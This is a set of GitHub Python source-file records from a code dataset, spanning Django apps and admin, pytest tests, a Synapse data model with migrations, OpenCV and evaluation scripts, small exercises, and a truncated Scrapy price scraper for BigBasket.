np.concatenate((results_slower_shootout, results_normal_shootout, results_faster_shootout), axis=0)\n }\n)\nax = sns.barplot(x=\"Prawdopodobieństwo strzelaniny\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/p_strzelaniny.pdf')\nelse:\n plt.show()\n\n","repo_name":"puchmichal/ZMS","sub_path":"project_3/simulation_do_wyslania.py","file_name":"simulation_do_wyslania.py","file_ext":"py","file_size_in_byte":17509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12296033732","text":"from django.core.mail import send_mail\nfrom app.celery import app\nfrom products.models import Product\nfrom users.models import User\nfrom products.subscriptions import (\n unsubscribe_from_product_arrival_notification\n)\n\nimport logging\n\n\nlogger = logging.getLogger()\n\n\ndef test_email_message(user, product, email=None) -> None:\n if not email:\n if not user.email:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> no email')\n try:\n send_mail(\n subject='product arrival notification',\n message=f'hi ,{user}, {product} is arrived',\n from_email='django-store@example.com',\n recipient_list=[email],\n fail_silently=False,\n )\n except Exception as e:\n logger.error(f'error to send email to {email} of notification product arrived {product.id} -> {e}')\n\n\n@app.task\ndef send_product_arrival_notification(user_id, product_id) -> None:\n user = User.objects.get(id=user_id)\n product = Product.objects.get(id=product_id)\n test_email_message(\n user=user,\n product=product,\n )\n unsubscribe_from_product_arrival_notification(user, product_id)\n","repo_name":"w44121/django-store","sub_path":"src/products/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71139795610","text":"import pytest\n\nfrom compute_wps import models\nfrom compute_wps.auth import traefik\nfrom compute_wps import exceptions\n\n@pytest.mark.django_db\ndef test_authenticate(mocker):\n meta = {}\n\n with pytest.raises(exceptions.AuthError):\n traefik.authenticate(meta)\n\n spy_user = mocker.spy(models.User.objects, \"get_or_create\")\n\n meta = {\"X-Forwarded-User\": \"user1@domain1.test\"}\n\n user = traefik.authenticate(meta)\n\n assert user.username == \"user1\"\n\n user = traefik.authenticate(meta)\n\n assert spy_user.call_count == 2\n\ndef test_traefikauthentication(mocker):\n auth = traefik.TraefikAuthentication()\n\n class Request:\n def META(self):\n return \"user1\"\n\n authenticate = mocker.patch.object(traefik, \"authenticate\")\n authenticate.return_value = None\n\n user = auth.authenticate(Request())\n\n assert user is None\n\n authenticate.return_value = \"user1\"\n\n user = auth.authenticate(Request())\n\n assert user == (\"user1\", None)\n","repo_name":"ESGF/esgf-compute-wps","sub_path":"compute/compute_wps/compute_wps/tests/test_auth_traefik.py","file_name":"test_auth_traefik.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"41455921559","text":"import logging\n\nimport synapse.common as s_common\nimport synapse.lib.tufo as s_tufo\nfrom synapse.lib.module import CoreModule, modelrev\n\nlogger = logging.getLogger(__name__)\n\nclass SynMod(CoreModule):\n @staticmethod\n def getBaseModels():\n modl = {\n\n 'types': (\n ('syn:splice', 
{'subof': 'guid'}),\n ('syn:auth:user', {'subof': 'str'}),\n ('syn:auth:role', {'subof': 'str'}),\n ('syn:auth:userrole', {'subof': 'comp', 'fields': 'user=syn:auth:user,role=syn:auth:role'}),\n ('syn:tagform', {'subof': 'comp', 'fields': 'tag,syn:tag|form,syn:prop', 'ex': '(foo.bar,baz:faz)'}),\n\n ('syn:alias', {'subof': 'str', 'regex': r'^\\$[a-z_]+$',\n 'doc': 'A synapse guid alias', 'ex': '$visi'}),\n ('syn:fifo', {'subof': 'comp', 'fields': 'name=str:lwr'}),\n ('syn:ingest', {'subof': 'str:lwr'}),\n ('syn:log', {'subof': 'guid'}),\n\n ),\n\n 'forms': (\n\n ('syn:splice', {'local': 1}, (\n ('act', {'ptype': 'str:lwr'}),\n ('time', {'ptype': 'time'}),\n ('node', {'ptype': 'guid'}),\n ('user', {'ptype': 'str:lwr'}),\n\n ('tag', {'ptype': 'str:lwr'}),\n ('form', {'ptype': 'str:lwr'}),\n ('valu', {'ptype': 'str:lwr'}),\n )),\n\n ('syn:alias', {'local': 1}, (\n ('iden', {'ptype': 'guid', 'defval': '*',\n 'doc': 'The GUID for the given alias name'}),\n )),\n\n ('syn:auth:user', {'local': 1}, (\n ('storm:limit:lift',\n {'ptype': 'int', 'defval': 10000, 'doc': 'The storm query lift limit for the user'}),\n ('storm:limit:time',\n {'ptype': 'int', 'defval': 120, 'doc': 'The storm query time limit for the user'}),\n )),\n\n ('syn:auth:role', {'local': 1}, (\n ('desc', {'ptype': 'str'}),\n )),\n\n ('syn:auth:userrole', {'local': 1}, (\n ('user', {'ptype': 'syn:auth:user'}),\n ('role', {'ptype': 'syn:auth:role'}),\n )),\n\n ('syn:fifo', {'ptype': 'syn:fifo', 'local': 1}, (\n ('name', {'ptype': 'str:lwr', 'doc': 'The fifo description'}),\n ('desc', {'ptype': 'str', 'doc': 'The fifo description'}),\n )),\n\n ('syn:trigger', {'ptype': 'guid', 'local': 1}, (\n ('en', {'ptype': 'bool', 'defval': 0, 'doc': 'Is the trigger currently enabled'}),\n ('on', {'ptype': 'syn:perm'}),\n ('run', {'ptype': 'syn:storm'}),\n ('user', {'ptype': 'syn:auth:user'}),\n )),\n\n ('syn:core', {'doc': 'A node representing a unique Cortex'}, ()),\n ('syn:form', {'doc': 'The base form type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'basic form definition'}),\n ('ver', {'ptype': 'int', 'doc': 'form version within the model'}),\n ('model', {'ptype': 'str', 'doc': 'which model defines a given form'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this form'}),\n ('local', {'ptype': 'bool', 'defval': 0,\n 'doc': 'Flag used to determine if a form should not be included in splices'}),\n )),\n ('syn:prop', {'doc': 'The base property type.'}, (\n ('doc', {'ptype': 'str', 'doc': 'Description of the property definition.'}),\n ('title', {'ptype': 'str', 'doc': 'A short description of the property definition.'}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form of the property.'}),\n ('ptype', {'ptype': 'syn:type', 'doc': 'Synapse type for this field'}),\n ('req', {'ptype': 'bool', 'doc': 'Set to 1 if this property is required to form teh node.'}),\n ('relname', {'ptype': 'str', 'doc': 'Relative name of the property'}),\n ('base', {'ptype': 'str', 'doc': 'Base name of the property'}),\n ('glob', {'ptype': 'bool', 'defval': 0, 'doc': 'Set to 1 if this property defines a glob'}),\n ('defval', {'doc': 'Set to the default value for this property', 'glob': 1}),\n ('univ', {'ptype': 'bool',\n 'doc': 'Specifies if a prop is universal and has no form associated with it.'}),\n )),\n ('syn:type', {'doc': 'The base type type.'}, (\n ('ctor', {'ptype': 'str', 'doc': 'Python path to the class used to instantiate the type.'}),\n ('subof', {'ptype': 'syn:type', 'doc': 'Type which this inherits from.'}),\n ('*', {'glob': 1})\n )),\n 
('syn:tag', {'doc': 'The base form for a synapse tag.'}, (\n ('up', {'ptype': 'syn:tag', 'doc': ''}),\n ('doc', {'ptype': 'str', 'defval': '', }),\n ('depth', {'ptype': 'int', 'doc': 'How deep the tag is in the hierarchy', 'defval': 0}),\n ('title', {'ptype': 'str', 'doc': '', 'defval': ''}),\n ('base', {'ptype': 'str', 'doc': '', 'ro': 1}),\n\n )),\n ('syn:tagform', {'doc': 'A node describing the meaning of a tag on a specific form'}, (\n ('tag', {'ptype': 'syn:tag', 'doc': 'The tag being documented', 'ro': 1}),\n ('form', {'ptype': 'syn:prop', 'doc': 'The form that the tag applies too', 'ro': 1}),\n ('doc', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The long form description for what the tag means on the given node form'}),\n ('title', {'ptype': 'str:txt', 'defval': '??',\n 'doc': 'The short name for what the tag means the given node form'}),\n )),\n ('syn:model', {'ptype': 'str', 'doc': 'prefix for all forms with in the model'}, (\n ('hash', {'ptype': 'guid', 'doc': 'version hash for the current model'}),\n ('prefix', {'ptype': 'syn:prop', 'doc': 'Prefix used by teh types/forms in the model'}),\n )),\n ('syn:seq', {'ptype': 'str:lwr', 'doc': 'A sequential id generation tracker'}, (\n ('width', {'ptype': 'int', 'defval': 0, 'doc': 'How many digits to use to represent the number'}),\n ('nextvalu', {'ptype': 'int', 'defval': 0, 'doc': 'The next sequential value'}),\n )),\n ('syn:ingest', {'ptype': 'syn:ingest', 'local': 1}, (\n ('time', {'ptype': 'time'}),\n ('text', {'ptype': 'json'})\n )),\n ('syn:log', {'ptype': 'guid', 'local': 1}, (\n ('subsys', {'ptype': 'str', 'defval': '??',\n 'doc': 'Named subsystem which originaed teh log event'}),\n ('level', {'ptype': 'int', 'defval': logging.WARNING, }),\n ('time', {'ptype': 'time', 'doc': 'When the log event occured'}),\n ('exc', {'ptype': 'str', 'doc': 'Exception class name if caused by an exception'}),\n ('info:*', {'glob': 1})\n )),\n )\n }\n\n name = 'syn'\n return ((name, modl),)\n\n @modelrev('syn', 201709051630)\n def _delOldModelNodes(self):\n types = self.core.getRowsByProp('syn:type')\n forms = self.core.getRowsByProp('syn:form')\n props = self.core.getRowsByProp('syn:prop')\n syncore = self.core.getRowsByProp('.:modl:vers:syn:core')\n\n with self.core.getCoreXact():\n [self.core.delRowsById(r[0]) for r in types]\n [self.core.delRowsById(r[0]) for r in forms]\n [self.core.delRowsById(r[0]) for r in props]\n [self.core.delRowsById(r[0]) for r in syncore]\n\n @modelrev('syn', 201709191412)\n def _revModl201709191412(self):\n '''\n Migrate the XREF types to use the propvalu syntax.\n '''\n tick = s_common.now()\n adds = []\n dels = set()\n\n nforms = set()\n\n for form in self.core.getModelDict().get('forms'):\n sforms = self.core.getTypeOfs(form)\n if 'xref' in sforms:\n nforms.add(form)\n\n for ntyp in nforms:\n nodes = self.core.getTufosByProp(ntyp)\n xtyp = '{}:xtype'.format(ntyp)\n xrefp = '{}:xref'.format(ntyp)\n xrefpint = '{}:xref:intval'.format(ntyp)\n xrefpstr = '{}:xref:strval'.format(ntyp)\n xrefprop = '{}:xref:prop'.format(ntyp)\n for node in nodes:\n iden = node[0]\n srcvtype = node[1].get(xtyp)\n if srcvtype is None:\n # This is expensive node level introspection :(\n for prop, valu in s_tufo.props(node).items():\n if prop.startswith('xref:'):\n form = prop.split('xref:', 1)[1]\n if self.core.isTufoForm(form):\n srcvtype = form\n break\n if not srcvtype:\n raise s_common.NoSuchProp(iden=node[0], type=ntyp,\n mesg='Unable to find a xref prop which is a form for migrating a '\n 'XREF node.')\n srcprp = 
'{}:xref:{}'.format(ntyp, srcvtype)\n srcv = node[1].get(srcprp)\n valu, subs = self.core.getPropNorm(xrefp, [srcvtype, srcv])\n adds.append((iden, xrefp, valu, tick))\n adds.append((iden, xrefprop, srcvtype, tick))\n if 'intval' in subs:\n adds.append((iden, xrefpint, subs.get('intval'), tick))\n else:\n adds.append((iden, xrefpstr, subs.get('strval'), tick))\n dels.add(srcprp)\n dels.add(xtyp)\n with self.core.getCoreXact():\n self.core.addRows(adds)\n for prop in dels:\n self.core.delRowsByProp(prop)\n\n @modelrev('syn', 201710191144)\n def _revModl201710191144(self):\n with self.core.getCoreXact():\n now = s_common.now()\n adds = []\n logger.debug('Lifting tufo:form rows')\n for i, _, v, t in self.core.store.getRowsByProp('tufo:form'):\n adds.append((i, 'node:created', t, now),)\n logger.debug('Deleting existing node:created rows')\n self.core.store.delRowsByProp('node:created')\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:created rows'.format(tot))\n i = 0\n n = 100000\n for chunk in s_common.chunks(adds, n):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Finished adding node:created rows to the Cortex')\n\n @modelrev('syn', 201711012123)\n def _revModl201711012123(self):\n now = s_common.now()\n forms = sorted(self.core.getTufoForms())\n nforms = len(forms)\n for n, form in enumerate(forms):\n adds = []\n logger.debug('Computing node:ndef rows for [{}]'.format(form))\n for i, p, v, t in self.core.store.getRowsByProp(form):\n # This is quicker than going through the norm process\n nv = s_common.guid((p, v))\n adds.append((i, 'node:ndef', nv, now))\n\n if adds:\n tot = len(adds)\n logger.debug('Adding {:,d} node:ndef rows for [{}]'.format(tot, form))\n with self.core.getCoreXact() as xact:\n i = 0\n nt = 100000\n for chunk in s_common.chunks(adds, nt):\n self.core.store.addRows(chunk)\n i = i + len(chunk)\n logger.debug('Loading {:,d} [{}%] rows into transaction'.format(i, int((i / tot) * 100)))\n logger.debug('Processed {:,d} [{}%] forms.'.format(n, int((n / nforms) * 100)))\n logger.debug('Finished adding node:ndef rows to the Cortex')\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/models/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":12757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"30185593592","text":"from django.contrib import admin\nfrom models import (Province, District, Zone, School)\nfrom rts.utils import DistrictIdFilter, ManagePermissions\nfrom rts.actions import export_select_fields_csv_action\n\n\n\nclass ProvinceAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\"]\n\n\nclass DistrictAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"province\"]\n\n\nclass ZoneAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"name\", \"district\"]\n search_fields = [\"name\"]\n\n\nclass SchoolAdmin(ManagePermissions):\n actions = [export_select_fields_csv_action(\"Export selected objects as CSV file\")]\n list_display = [\"emis\", \"name\", \"zone\", \"display_district\", \"display_province\"]\n search_fields = [\"emis\"]\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == 
\"zone\":\n kwargs[\"queryset\"] = Zone.objects.order_by('name')\n return super(SchoolAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n def queryset(self, request):\n \"\"\"\n Limits queries for pages that belong to district admin\n \"\"\"\n qs = super(SchoolAdmin, self).queryset(request)\n return DistrictIdFilter(parent=self, request=request, qs=qs).queryset()\n\n\nadmin.site.register(Province, ProvinceAdmin)\nadmin.site.register(District, DistrictAdmin)\nadmin.site.register(Zone, ZoneAdmin)\nadmin.site.register(School, SchoolAdmin)\n","repo_name":"praekeltfoundation/django-rts-zambia","sub_path":"hierarchy/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71567680732","text":"class Drink:\n _cups = [\"레귤러\",\"점보\"]\n _ices = [\"0%\", \"50%\", \"100%\", \"150%\"]\n _sugar = [\"0%\", \"50%\", \"100%\", \"150%\"]\n def __init__(self, name, price):\n self.name=name\n self.price=price\n self.cup=0#0:레귤러,1: 점보\n self.ice=2 #0:0%, 1:50%,2:100$, 3:150$ \n self.sugar =2 #0:0%, 1=50%,2=100%, 3=150%\n\n def set_cup(self):\n self.cup = input (\"컵사이즈를 선택하세요(0:레귤러, 1=점보)\")\n if self.cup==\"\":\n self.cup=0\n else:\n self.cup= int (self.cup)\n \n\n def set_ice(self):\n self.ice = input(\"얼음량을 선택하세요(0:0%, 1:50%,2:100%, 3:150% \")\n if self.ice==\"\":\n self.ice=2\n else:\n self.ice= int (self.ice)\n\n def set_sugar(self):\n self.sugar = input(\"당도를 선택하세요. 0:0%, 1=50%,2=100%, 3=150%\")\n if self.sugar==\"\":\n self.sugar=2\n else:\n self.sugar= int (self.ice)\n \n def __str__(self):\n return \"이름:\"+self.name+\"\\t가격: \"+str(self.price)+\"\\t컵사이즈: \"+self._cups[self.cup]+\"\\t얼음량: \"+self._ices[self.ice]+\"\\t당도:\"+self._sugar[self.sugar]\n \n def order(self):\n self.set_cup()\n self.set_ice()\n self.set_sugar()","repo_name":"gyogo/Programming-Python-","sub_path":"아마스빈/drink.py","file_name":"drink.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39873469883","text":"from rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.response import Response\r\n\r\nfrom components.comments.models import UserCommentsModel\r\nfrom components.comments.serializers import (\r\n UserCommentsListModelSerializer,\r\n)\r\nfrom components.metrics.models import WeatherMetricsModel\r\nfrom shared.api.views import QueryModelViewSet\r\n\r\n\r\nclass UserCommentsQueryModelViewSet(QueryModelViewSet):\r\n \"\"\"QueryModelViewSet для работы с комментариями пользователя\"\"\"\r\n\r\n queryset = UserCommentsModel.objects.all().order_by('created')\r\n serializer_class = UserCommentsListModelSerializer\r\n permission_classes = [IsAuthenticated]\r\n pagination_class = None\r\n\r\n def list(self, request, *args, **kwargs):\r\n queryset = self.filter_queryset(self.get_queryset())\r\n if 'metricId' in request.query_params:\r\n metric_id = int(request.query_params.get('metricId'))\r\n metric_model = WeatherMetricsModel.objects.get(id=metric_id)\r\n queryset = self.queryset.filter(weather_metric=metric_model)\r\n\r\n serializer = self.get_serializer(queryset, many=True)\r\n return 
Response(serializer.data)\r\n","repo_name":"thebadfordota/Robolife2","sub_path":"backend/components/comments/views/user_comments_query_model_viewset.py","file_name":"user_comments_query_model_viewset.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"15674923903","text":"\r\n\r\na = []\r\nwhile True:\r\n flag = input(\"是否输入,若回答yes则继续输入,若回答no则停止输入\")\r\n if flag == \"yes\":\r\n while True:\r\n c = eval(input(\"请输入成绩:\"))\r\n if c < 0 or c > 100:\r\n print(\"输入错误,请重新输入\")\r\n else:\r\n a.append(c)\r\n break\r\n elif flag == \"no\":\r\n break\r\n\r\ngeshu = len(a)\r\nzongfen = 0\r\nfor i in a:\r\n zongfen = zongfen + i\r\npingjunfen = zongfen/geshu\r\nzuigao = max(a)\r\n\r\nprint(\"共输入了\", geshu, \"个成绩\", \"总成绩为\", zongfen,\r\n \"平均分为\", pingjunfen, \"最高分为\", zuigao)\r\n","repo_name":"qaq112233/PythonWork","sub_path":"第10周/31计算成绩.py","file_name":"31计算成绩.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"22419068715","text":"import cv2\nprint(cv2.__version__)\nevt=-1\ncoord=[]\ndef click(event,x,y,flag,params):\n global pnts\n global evt\n if event==cv2.EVENT_LBUTTONDOWN:\n print('Mouse Event Was: ',event)\n print(x,',',y)\n pnts=(x,y)\n coord.append(pnts)\n print(coord)\n evt=event\ndispW=640\ndispH=480\nflip=0\ncv2.namedWindow('picam')\ncv2.setMouseCallback('picam',click)\n#Uncomment These next Two Line for Pi Camera\ncamSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! 
appsink'\ncam= cv2.VideoCapture(camSet)\n \n#Or, if you have a WEB cam, uncomment the next line\n#(If it does not work, try setting to '1' instead of '0')\n#cam=cv2.VideoCapture(0)\nwhile True:\n ret, frame = cam.read()\n for pnts in coord:\n cv2.circle(frame,pnts,5,(0,255,255),-3)\n font=cv2.FONT_HERSHEY_PLAIN\n myStr=str(pnts)\n cv2.putText(frame,myStr,pnts,font,1,(0,0,0),2)\n cv2.imshow('picam',frame)\n cv2.moveWindow('picam',0,0)\n keyEvent=cv2.waitKey(1)\n if keyEvent==ord('q'):\n break\n if keyEvent==ord('c'):\n coord=[]\ncam.release()\ncv2.destroyAllWindows()\n ","repo_name":"ANGELARIELPLAZA/CURSO-JETSON-NANO","sub_path":"CURSO_JETSON_NANO_IA/JETSON_NANO/opencv/opencv-coordenadas.py","file_name":"opencv-coordenadas.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37105642704","text":"import sys\n\ninput_str=sys.stdin.readline().strip()\nalpabet=[[0 for j in range(len(input_str)+1)] for i in range(26)]\nq_count=int(sys.stdin.readline().strip())\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 위치를 저장한다.\nfor k in range(len(input_str)):\n alpabet[ord(input_str[k])-97][k+1]=1\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 prefix count를 구한다.\nfor a in range(26):\n for j in range(len(input_str)):\n alpabet[a][j+1]=alpabet[a][j]+alpabet[a][j+1]\n\n#출력한다.\nfor b in range(q_count):\n c,start,end=sys.stdin.readline().split()\n print(alpabet[ord(c)-97][int(end)+1]-alpabet[ord(c)-97][int(start)])","repo_name":"styughjvbn/Algorithm_study","sub_path":"week1-10/week1/3_16139.py","file_name":"3_16139.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24432054714","text":"from nha.evaluation import metrics as nha_metrics\nimport torch.nn as nn\nimport nha.models\nfrom nha.util.general import *\nfrom nha.data.real import digitize_segmap\n\nimport torch\nimport torchvision.transforms.functional as ttF\n\nfrom typing import *\nfrom tqdm import tqdm\nfrom collections import OrderedDict\n\n\nclass Evaluator:\n \"\"\"\n class to conveniently calculate various scores for predicted images.\n Attention: Keep in mind to blur mask before doing alpha merging such\n that CPBD (sharpness evaluation) is not influenced by these edge artifacts!\n \"\"\"\n\n def __init__(\n self,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n device=\"cuda\",\n load_bbx_detector=False,\n ):\n \"\"\"\n :param metrics: a list of metrics to include in the evaluation process\n :param device: where to run the evaluation\n \"\"\"\n\n # ensures that if LMK in metrics, its calculated first such that bbs that were detected on the way can be reused\n self._metrics = OrderedDict()\n if \"LMK\" in [m.upper() for m in metrics]:\n metrics = list(metrics)\n metrics.remove(\"LMK\")\n metrics = [\"LMK\"] + metrics\n\n self._device = device\n self._bbx_detector = (\n nha_metrics.FaceBBxDetector(device) if load_bbx_detector else None\n )\n\n for m in metrics:\n m = m.upper()\n if m == \"LMK\":\n self._metrics[\"LMK\"] = nha_metrics.EuclLmkDistance(device)\n elif m == \"L1\":\n self._metrics[\"L1\"] = nn.L1Loss(reduction=\"none\")\n elif m == \"L2\":\n self._metrics[\"L2\"] = nn.MSELoss(reduction=\"none\")\n elif m == \"MS_SSIM\":\n self._metrics[\"MS_SSIM\"] = nha_metrics.MS_SSIM(device)\n elif m == \"PSNR\":\n self._metrics[\"PSNR\"] = nha_metrics.PSNR(device)\n elif m == \"LPIPS\":\n self._metrics[\"LPIPS\"] = nha_metrics.LPIPS(device)\n elif m == 
\"CPBD\":\n self._metrics[\"CPBD\"] = nha_metrics.CPBD(device)\n\n def __call__(\n self,\n pred: torch.Tensor,\n gt: torch.Tensor,\n reduction=\"none\",\n bbs=None,\n gt_landmarks=None,\n ):\n \"\"\"\n returns dictionary with evaluation scores for L1, L2, PSNR, MS_SSIM, LMK, LPIPS, CPBD.\n If reduction==\"none\", each dictionary value is a torch tensor of length N.\n If reduction in [\"mean\", \"sum\"], dict values are scalar tensors\n :param pred: torch tensor of shape N x 3 x H x W with entries -1 ... +1\n todo add predicted landmarks\n :param gt: torch.tensor of shape N x 3 x H x W with entries -1 ... +1\n :param bbs: None or np array of shape N x 5\n :param gt_landmarks: None or np array of shape N x 68 x 2\n :param reduction: How to reduce scores along N dim. One of\n - \"none\": no reduction, scores will have length N\n - \"mean\": scalar scores\n :return:\n \"\"\"\n\n scores = dict()\n pred = pred.to(self._device)\n gt = gt.to(self._device)\n\n for name, metric in self._metrics.items():\n if name in [\"L1\", \"L2\"]:\n scores[name] = torch.flatten(metric(pred, gt), start_dim=1).mean(dim=-1)\n elif name == \"LMK\":\n scores[name], bbs = metric(pred, gt, return_bbs=True, bbs=bbs)\n elif name == \"CPBD\":\n scores[name] = metric(pred)\n else:\n scores[name] = metric(pred, gt)\n\n if reduction == \"mean\":\n for key, val in scores.items():\n scores[key] = torch.mean(val)\n if reduction == \"sum\":\n for key, val in scores.items():\n scores[key] = torch.sum(val)\n\n return scores\n\n\n@torch.no_grad()\ndef evaluate_models(\n models: OrderedDict,\n dataloader,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n blur_seg=0.0,\n):\n \"\"\"\n evaluates the performances of several models and creates a comparison dictionary. Keys are the same as given in\n 'models'; vals are dictionaries with keys:\n - [Metric] ... contains evaluated metrics score as float\n\n :param models: dict where key are the model names, each value is another dict with keys\n 'ckpt' (path to checkpoint file) and 'type' str model type identifier as defined in\n nha.util.models.__init__\n e.g.: {\"model_A\": \"/path/to/checkpoint\"},\n \"model_B\": ..., }\n\n\n :param dataloader: validation dataloader\n :param blur_seg: specifies factor to blur segmentation masks by before doing bg filling. If 0 has no effect. 
May\n be used for more useful cpbd score evaluation\n :param debug: if true: plots example of compared prediction - gt image pair\n :return: dict with following structure:\n {\"MODEL_NAME\":\n {\"SCORE_NAME\": score value (as float),\n }\n ...,\n }\n \"\"\"\n\n evaluator = Evaluator(metrics=metrics)\n scores = OrderedDict()\n\n for model_name, ckpt in models.items():\n # loading model\n model = nha.models.nha_optimizer.NHAOptimizer.load_from_checkpoint(ckpt).cuda()\n model.eval()\n\n # evaluation:\n scores[model_name] = OrderedDict()\n for batch in tqdm(\n iterable=dataloader, desc=f\"Quantitative Analysis of '{model_name}'\"\n ):\n batch = dict_2_device(batch, model.device)\n\n # get prediction\n pred_rgba = model.forward(batch)\n pred_rgb, pred_mask = pred_rgba[:, :3], pred_rgba[:, 3:]\n\n # get gt\n gt_rgb = batch[\"rgb\"]\n gt_mask = digitize_segmap(batch[\"seg\"]).float()\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # blur masks if specified:\n if blur_seg > 0:\n pred_mask = ttF.gaussian_blur(\n pred_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n gt_mask = ttF.gaussian_blur(\n gt_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n\n pred_rgb = fill_tensor_background(pred_rgb, pred_mask)\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # evaluate image\n scores[model_name] = cat_torch_dicts(\n scores[model_name], evaluator(pred_rgb, gt_rgb)\n )\n\n # calculating average score for evaluation metrics\n for key, val in scores[model_name].items():\n scores[model_name][key] = val.mean().detach().cpu().item()\n\n return scores\n","repo_name":"philgras/neural-head-avatars","sub_path":"nha/evaluation/eval_suite.py","file_name":"eval_suite.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":462,"dataset":"github-code","pt":"32"} +{"seq_id":"1475376827","text":"from openapi.utils import extend_schema_tags\n\ntag = 'extension'\npath = tag\nname = '插件配置'\n\nextend_schema_tags(\n tag,\n name,\n {\n 'type':'dashboard_page',\n 'init': {\n 'path': '/api/v1/marketplace/',\n 'method': 'get'\n },\n 'local': {\n 'install': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/',\n 'method': 'post',\n 'description': '点击安装'\n },\n 'update': {\n 'tag': 'extension.update',\n 'description': '编辑'\n },\n 'delete': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'delete',\n 'description': '删除'\n }\n }\n }\n)\n\nextension_update_tag = 'extension.update'\nextension_update_name = '编辑系统插件'\n\nextend_schema_tags(\n extension_update_tag,\n extension_update_name,\n {\n 'type': 'form_page',\n 'init': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'get'\n },\n 'global': {\n 'update': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'put',\n 'description': '确定'\n }\n }\n }\n)","repo_name":"0079123/arkid","sub_path":"api/v1/pages/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"1458225480","text":"#This program has been created to extract the prices from Big Basket\n#It currently can extract the prices only from the category list of products, eg. 
Fruits and Vegetables\n#Urls of the pages have to be provided in the excel-urls.csv present in the main project folder\n#DO NOT CHANGE THE NAME/EXTENSION OF urls.csv\n#This program generates an output file-prices-(date-time).csv, which extracts the product item, mrp and final price\n\nimport scrapy\nimport csv\nfrom itertools import zip_longest\nimport datetime\nimport re\nimport json\nfrom selenium import webdriver \nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nclass ProductPriceSpider(scrapy.Spider):\n\tname = \"bigbasket\"\n\n\tdef __init__(self):\n\t\tself.driver = webdriver.Chrome('/usr/bin/chromedriver')\n\t\t\t\t\t \n\tdef start_requests(self):\n\t\t#List of all urls to be searched. Commenting below code for testing \n\t\turls = []\n\n\t\t#reading input csv file\n\t\tfileName = \"urls.csv\"\n\t\twith open(fileName, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\turls.append(line)\n\n\t\tself.log(urls) \n\n\t\t#start extracting for all urls\n\t\tfor url in urls:\n\t\t\tself.log(url)\n\t\t\tyield scrapy.Request(url=url, callback=self.parse_link)\n\n\t#Parser specific for bigbasket htmls\n\t#Parser extracts item product name, quantity, MRP and final price\n\tdef parse_link(self, 